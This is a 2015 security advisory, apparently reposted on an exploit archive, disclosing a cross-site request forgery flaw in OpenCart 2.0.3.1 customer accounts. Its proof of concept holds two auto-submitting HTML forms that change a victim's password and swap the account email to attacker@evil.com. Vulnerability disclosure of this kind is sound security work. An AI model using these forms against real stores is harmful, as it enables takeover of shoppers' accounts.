OpenCart 2.0.3.1 Cross Site Request Forgery

OpenCart 2.0.3.1 Cross Site Request Forgery: Posted Nov 6, 2015; Authored by Tim Coen | Site curesec.com; OpenCart version 2.0.3.1 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 38f82a4a75636588428cb1eae83c0cd0b137b80811c73911cdde33ecd52b04f8; Download | Favorite | View

OpenCart 2.0.3.1 Cross Site Request Forgery

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    OpenCart 2.0.3.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      https://www.opencart.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for
customers. This means that customer accounts can be compromised by an attacker
if the victim visits an attacker controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of
OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password" >
    <input type="hidden" name="password" value="12345">
    <input type="hidden" name="confirm" value="12345">
</form>
<script>document.myform.submit();</script>

Change profile information, including email address, which is used when logging
in:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit" >
    <input type="hidden" name="currency" value="USD">
    <input type="hidden" name="language" value="en">
    <input type="hidden" name="firstname" value="Jane">
    <input type="hidden" name="lastname" value="Smith">
    <input type="hidden" name="email" value="attacker@evil.com">
    <input type="hidden" name="telephone" value="1234567">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/   Informed Vendor about Issue (no reply)
2015
09/22/   Reminded Vendor of disclosure date
2015
09/23/   Vendor points out that issue is already known, and that they do not
2015     plan on releasing a fix
10/07/   Disclosed to public
2015


Blog Reference:
http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

OpenCart 2.0.3.1 Cross Site Request Forgery

OpenCart 2.0.3.1 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenCart 2.0.3.1 Cross Site Request Forgery

Share This

OpenCart 2.0.3.1 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems